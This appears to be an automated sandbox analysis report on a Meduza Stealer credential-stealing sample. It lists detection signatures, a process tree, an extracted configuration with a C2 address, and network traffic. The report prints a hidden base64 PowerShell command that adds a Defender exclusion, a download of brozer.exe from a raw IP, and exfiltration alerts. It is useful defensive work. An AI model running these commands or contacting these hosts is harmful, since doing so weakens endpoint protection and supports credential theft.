Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
9RM52QaURq.exe

Overview

General Information

Sample name:9RM52QaURq.exe
renamed because original name is a hash value
Original sample name:ca53439dbc9699e109a1810227c124dadca4066758511727be95e57b8ce3bc0f.exe
Analysis ID:1556367
MD5:9913a016528f9d9c4aac737c6a06c596
SHA1:197435ebdeab5f6df6e10d1c5aec40812cb9dfdf
SHA256:ca53439dbc9699e109a1810227c124dadca4066758511727be95e57b8ce3bc0f
Tags:45-130-145-152exeuser-JAMESWT_MHT
Infos:

Detection

CredGrabber, Meduza Stealer
Score:93
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected CredGrabber
Yara detected Meduza Stealer
AI detected suspicious sample
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious powershell command line found
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query locales information (e.g. system language)
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Queries time zone information
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Execution of Powershell with Base64
Suricata IDS alerts with low severity for network traffic
Terminates after testing mutex exists (may check infected machine status)
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • 9RM52QaURq.exe (PID: 7148 cmdline: "C:\Users\user\Desktop\9RM52QaURq.exe" MD5: 9913A016528F9D9C4AAC737C6A06C596)
    • powershell.exe (PID: 3164 cmdline: "powershell.exe" -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAzADgASABzAHEAdwBIAGwAYgBHAFwAMwBVAHUAeABUAEgANgBGAE0AWAAuAGUAeABlACcA MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 8 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 2640 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • 3UuxTH6FMX.exe (PID: 3760 cmdline: "C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exe" MD5: 183E24B654414D7BE786CCD8E6A108A5)
  • cleanup
{"C2 url": "45.130.145.152", "grabber_max_size": 4194304, "anti_vm": true, "anti_dbg": true, "self_destruct": false, "extensions": ".txt;.doc;.docx;.pdf;.xls;.xlsx;.log;.db;.sqlite", "build_name": "Work", "links": "", "port": 15666}
SourceRuleDescriptionAuthorStrings
00000008.00000002.2193147052.00000218BFD60000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_MeduzaStealerYara detected Meduza StealerJoe Security
    00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_MeduzaStealerYara detected Meduza StealerJoe Security
      Process Memory Space: 3UuxTH6FMX.exe PID: 3760JoeSecurity_MeduzaStealerYara detected Meduza StealerJoe Security
        Process Memory Space: 3UuxTH6FMX.exe PID: 3760JoeSecurity_CredGrabberYara detected CredGrabberJoe Security
          Process Memory Space: 3UuxTH6FMX.exe PID: 3760JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            SourceRuleDescriptionAuthorStrings
            8.2.3UuxTH6FMX.exe.218bfb50000.0.unpackJoeSecurity_MeduzaStealerYara detected Meduza StealerJoe Security
              8.2.3UuxTH6FMX.exe.218bfb50000.0.raw.unpackJoeSecurity_MeduzaStealerYara detected Meduza StealerJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAzADgASABzAHEAdwBIAGwAYgBHAFwAMwBVAHUAeABUAEgANgBGAE0AWAAuAGUAeABlACcA, CommandLine: "powershell.exe" -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAzADgASABzAHEAdwBIAGwAYgBHAFwAMwBVAHUAeABUAEgANgBGAE0AWAAuAGUAeABlACcA, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\9RM52QaURq.exe", ParentImage: C:\Users\user\Desktop\9RM52QaURq.exe, ParentProcessId: 7148, ParentProcessName: 9RM52QaURq.exe, ProcessCommandLine: "powershell.exe" -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAzADgASABzAHEAdwBIAGwAYgBHAFwAMwBVAHUAeABUAEgANgBGAE0AWAAuAGUAeABlACcA, ProcessId: 3164, ProcessName: powershell.exe
                Source: Process startedAuthor: frack113: Data: Command: "powershell.exe" -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAzADgASABzAHEAdwBIAGwAYgBHAFwAMwBVAHUAeABUAEgANgBGAE0AWAAuAGUAeABlACcA, CommandLine: "powershell.exe" -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAzADgASABzAHEAdwBIAGwAYgBHAFwAMwBVAHUAeABUAEgANgBGAE0AWAAuAGUAeABlACcA, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\9RM52QaURq.exe", ParentImage: C:\Users\user\Desktop\9RM52QaURq.exe, ParentProcessId: 7148, ParentProcessName: 9RM52QaURq.exe, ProcessCommandLine: "powershell.exe" -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAzADgASABzAHEAdwBIAGwAYgBHAFwAMwBVAHUAeABUAEgANgBGAE0AWAAuAGUAeABlACcA, ProcessId: 3164, ProcessName: powershell.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAzADgASABzAHEAdwBIAGwAYgBHAFwAMwBVAHUAeABUAEgANgBGAE0AWAAuAGUAeABlACcA, CommandLine: "powershell.exe" -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAzADgASABzAHEAdwBIAGwAYgBHAFwAMwBVAHUAeABUAEgANgBGAE0AWAAuAGUAeABlACcA, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\9RM52QaURq.exe", ParentImage: C:\Users\user\Desktop\9RM52QaURq.exe, ParentProcessId: 7148, ParentProcessName: 9RM52QaURq.exe, ProcessCommandLine: "powershell.exe" -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAzADgASABzAHEAdwBIAGwAYgBHAFwAMwBVAHUAeABUAEgANgBGAE0AWAAuAGUAeABlACcA, ProcessId: 3164, ProcessName: powershell.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-15T10:28:51.927747+010020494411A Network Trojan was detected192.168.2.45397645.130.145.15215666TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-15T10:28:51.927747+010020508061A Network Trojan was detected192.168.2.45397645.130.145.15215666TCP
                2024-11-15T10:28:51.932774+010020508061A Network Trojan was detected192.168.2.45397645.130.145.15215666TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-15T10:28:51.927747+010020508071A Network Trojan was detected192.168.2.45397645.130.145.15215666TCP
                2024-11-15T10:28:51.932774+010020508071A Network Trojan was detected192.168.2.45397645.130.145.15215666TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 8.2.3UuxTH6FMX.exe.218bfb50000.0.unpackMalware Configuration Extractor: Meduza Stealer {"C2 url": "45.130.145.152", "grabber_max_size": 4194304, "anti_vm": true, "anti_dbg": true, "self_destruct": false, "extensions": ".txt;.doc;.docx;.pdf;.xls;.xlsx;.log;.db;.sqlite", "build_name": "Work", "links": "", "port": 15666}
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeReversingLabs: Detection: 28%
                Source: 9RM52QaURq.exeReversingLabs: Detection: 18%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 92.6% probability
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBC1EA0 CryptUnprotectData,LocalFree,8_2_00000218BFBC1EA0
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFB85EE0 CryptUnprotectData,LocalFree,8_2_00000218BFB85EE0
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBC21C0 CryptProtectData,LocalFree,8_2_00000218BFBC21C0
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFC22090 CryptUnprotectData,8_2_00000218BFC22090
                Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:53977 version: TLS 1.2
                Source: 9RM52QaURq.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: C:\Users\outgl\source\repos\Installer_sharp\obj\Release\Installer_sharp.pdb source: 9RM52QaURq.exe
                Source: Binary string: C:\Users\outgl\source\repos\Installer_sharp\obj\Release\Installer_sharp.pdb8 source: 9RM52QaURq.exe
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFC098C0 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,8_2_00000218BFC098C0
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFC09810 FindClose,FindFirstFileExW,GetLastError,8_2_00000218BFC09810
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBD13B0 GetLogicalDriveStringsW,8_2_00000218BFBD13B0
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeFile opened: D:\sources\migration\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeFile opened: D:\sources\replacementmanifests\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeFile opened: D:\sources\migration\wtr\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeFile opened: D:\sources\replacementmanifests\microsoft-activedirectory-webservices\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeFile opened: D:\sources\replacementmanifests\microsoft-client-license-platform-service-migration\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeFile opened: D:\sources\replacementmanifests\hwvid-migration-2\Jump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h0_2_07352978

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2049441 - Severity 1 - ET MALWARE Win32/Unknown Grabber Base64 Data Exfiltration Attempt : 192.168.2.4:53976 -> 45.130.145.152:15666
                Source: Network trafficSuricata IDS: 2050806 - Severity 1 - ET MALWARE [ANY.RUN] Meduza Stealer Exfiltration M2 : 192.168.2.4:53976 -> 45.130.145.152:15666
                Source: global trafficTCP traffic: 192.168.2.4:53976 -> 45.130.145.152:15666
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.22.1Date: Fri, 15 Nov 2024 09:28:15 GMTContent-Type: application/octet-streamContent-Length: 2632704Last-Modified: Thu, 14 Nov 2024 19:32:03 GMTConnection: keep-aliveETag: "67365033-282c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 54 97 d1 e9 35 f9 82 e9 35 f9 82 e9 35 f9 82 f9 b1 fa 83 e1 35 f9 82 f9 b1 fd 83 e6 35 f9 82 f9 b1 fc 83 ba 35 f9 82 a2 4d fc 83 48 35 f9 82 a2 4d fa 83 ee 35 f9 82 a2 4d fd 83 fa 35 f9 82 d1 b5 fc 83 eb 35 f9 82 a1 b0 fd 83 cd 35 f9 82 a2 4d f8 83 e2 35 f9 82 e9 35 f8 82 68 35 f9 82 a2 b0 f0 83 fa 35 f9 82 a2 b0 06 82 e8 35 f9 82 a2 b0 fb 83 e8 35 f9 82 52 69 63 68 e9 35 f9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 e8 4f 34 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 29 00 6a 03 00 00 d6 24 00 00 00 00 00 f0 d0 02 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 28 00 00 04 00 00 00 00 00 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 e6 27 00 64 00 00 00 00 60 28 00 e0 01 00 00 00 30 28 00 70 2c 00 00 00 00 00 00 00 00 00 00 00 70 28 00 50 09 00 00 00 96 27 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 94 27 00 40 01 00 00 00 00 00 00 00 00 00 00 00 80 03 00 08 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 68 03 00 00 10 00 00 00 6a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 de 70 24 00 00 80 03 00 00 72 24 00 00 6e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 cc 28 00 00 00 00 28 00 00 12 00 00 00 e0 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 70 2c 00 00 00 30 28 00 00 2e 00 00 00 f2 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 e0 01 00 00 00 60 28 00 00 02 00 00 00 20 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 50 09 00 00 00 70 28 00 00 0a 00 00 00 22 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: text/html; text/plain; */*Host: api.ipify.orgCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /brozer.exe HTTP/1.1Host: 150.241.95.163Connection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 45.130.145.152 45.130.145.152
                Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
                Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
                Source: Joe Sandbox ViewASN Name: ASBAXETNRU ASBAXETNRU
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: unknownDNS query: name: api.ipify.org
                Source: unknownDNS query: name: api.ipify.org
                Source: Network trafficSuricata IDS: 2050807 - Severity 1 - ET MALWARE [ANY.RUN] Possible Meduza Stealer Exfiltration (TCP) : 192.168.2.4:53976 -> 45.130.145.152:15666
                Source: unknownTCP traffic detected without corresponding DNS query: 150.241.95.163
                Source: unknownTCP traffic detected without corresponding DNS query: 150.241.95.163
                Source: unknownTCP traffic detected without corresponding DNS query: 150.241.95.163
                Source: unknownTCP traffic detected without corresponding DNS query: 150.241.95.163
                Source: unknownTCP traffic detected without corresponding DNS query: 150.241.95.163
                Source: unknownTCP traffic detected without corresponding DNS query: 150.241.95.163
                Source: unknownTCP traffic detected without corresponding DNS query: 150.241.95.163
                Source: unknownTCP traffic detected without corresponding DNS query: 150.241.95.163
                Source: unknownTCP traffic detected without corresponding DNS query: 150.241.95.163
                Source: unknownTCP traffic detected without corresponding DNS query: 150.241.95.163
                Source: unknownTCP traffic detected without corresponding DNS query: 150.241.95.163
                Source: unknownTCP traffic detected without corresponding DNS query: 150.241.95.163
                Source: unknownTCP traffic detected without corresponding DNS query: 150.241.95.163
                Source: unknownTCP traffic detected without corresponding DNS query: 150.241.95.163
                Source: unknownTCP traffic detected without corresponding DNS query: 150.241.95.163
                Source: unknownTCP traffic detected without corresponding DNS query: 150.241.95.163
                Source: unknownTCP traffic detected without corresponding DNS query: 150.241.95.163
                Source: unknownTCP traffic detected without corresponding DNS query: 150.241.95.163
                Source: unknownTCP traffic detected without corresponding DNS query: 150.241.95.163
                Source: unknownTCP traffic detected without corresponding DNS query: 150.241.95.163
                Source: unknownTCP traffic detected without corresponding DNS query: 150.241.95.163
                Source: unknownTCP traffic detected without corresponding DNS query: 150.241.95.163
                Source: unknownTCP traffic detected without corresponding DNS query: 150.241.95.163
                Source: unknownTCP traffic detected without corresponding DNS query: 150.241.95.163
                Source: unknownTCP traffic detected without corresponding DNS query: 150.241.95.163
                Source: unknownTCP traffic detected without corresponding DNS query: 150.241.95.163
                Source: unknownTCP traffic detected without corresponding DNS query: 150.241.95.163
                Source: unknownTCP traffic detected without corresponding DNS query: 150.241.95.163
                Source: unknownTCP traffic detected without corresponding DNS query: 150.241.95.163
                Source: unknownTCP traffic detected without corresponding DNS query: 150.241.95.163
                Source: unknownTCP traffic detected without corresponding DNS query: 150.241.95.163
                Source: unknownTCP traffic detected without corresponding DNS query: 150.241.95.163
                Source: unknownTCP traffic detected without corresponding DNS query: 150.241.95.163
                Source: unknownTCP traffic detected without corresponding DNS query: 150.241.95.163
                Source: unknownTCP traffic detected without corresponding DNS query: 150.241.95.163
                Source: unknownTCP traffic detected without corresponding DNS query: 150.241.95.163
                Source: unknownTCP traffic detected without corresponding DNS query: 150.241.95.163
                Source: unknownTCP traffic detected without corresponding DNS query: 150.241.95.163
                Source: unknownTCP traffic detected without corresponding DNS query: 150.241.95.163
                Source: unknownTCP traffic detected without corresponding DNS query: 150.241.95.163
                Source: unknownTCP traffic detected without corresponding DNS query: 150.241.95.163
                Source: unknownTCP traffic detected without corresponding DNS query: 150.241.95.163
                Source: unknownTCP traffic detected without corresponding DNS query: 150.241.95.163
                Source: unknownTCP traffic detected without corresponding DNS query: 150.241.95.163
                Source: unknownTCP traffic detected without corresponding DNS query: 150.241.95.163
                Source: unknownTCP traffic detected without corresponding DNS query: 150.241.95.163
                Source: unknownTCP traffic detected without corresponding DNS query: 150.241.95.163
                Source: unknownTCP traffic detected without corresponding DNS query: 150.241.95.163
                Source: unknownTCP traffic detected without corresponding DNS query: 150.241.95.163
                Source: unknownTCP traffic detected without corresponding DNS query: 150.241.95.163
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBCE9F0 recv,recv,closesocket,WSACleanup,8_2_00000218BFBCE9F0
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: text/html; text/plain; */*Host: api.ipify.orgCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /brozer.exe HTTP/1.1Host: 150.241.95.163Connection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                Source: 9RM52QaURq.exe, 00000000.00000002.2134382653.0000000002B06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://150.241.95.163
                Source: 9RM52QaURq.exe, 00000000.00000002.2134382653.0000000002A71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://150.241.95.163/brozer.exe
                Source: 9RM52QaURq.exeString found in binary or memory: http://150.241.95.163/brozer.exeIError
                Source: 9RM52QaURq.exe, 00000000.00000002.2134382653.0000000002A71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://150.241.95.163/brozer.exeP
                Source: 3UuxTH6FMX.exe, 00000008.00000003.2097190041.00000218C0FD1000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2191984698.00000218C0FE0000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2192078543.00000218C0FE4000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2191951086.00000218C0FE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.microsoft.t/Regi
                Source: powershell.exe, 00000005.00000002.1981163512.0000000006008000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000005.00000002.1978076132.00000000050F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000005.00000002.1978076132.00000000051DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                Source: 9RM52QaURq.exe, 00000000.00000002.2134382653.0000000002B06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1978076132.0000000004FA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000005.00000002.1978076132.00000000051DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                Source: 9RM52QaURq.exe, 00000000.00000002.2138541168.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: powershell.exe, 00000005.00000002.1978076132.00000000050F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: 9RM52QaURq.exe, 00000000.00000002.2138541168.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: 9RM52QaURq.exe, 00000000.00000002.2138541168.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: 9RM52QaURq.exe, 00000000.00000002.2138541168.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: 9RM52QaURq.exe, 00000000.00000002.2138541168.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: 9RM52QaURq.exe, 00000000.00000002.2138541168.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: 9RM52QaURq.exe, 00000000.00000002.2138541168.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: 9RM52QaURq.exe, 00000000.00000002.2138541168.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: 9RM52QaURq.exe, 00000000.00000002.2138541168.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
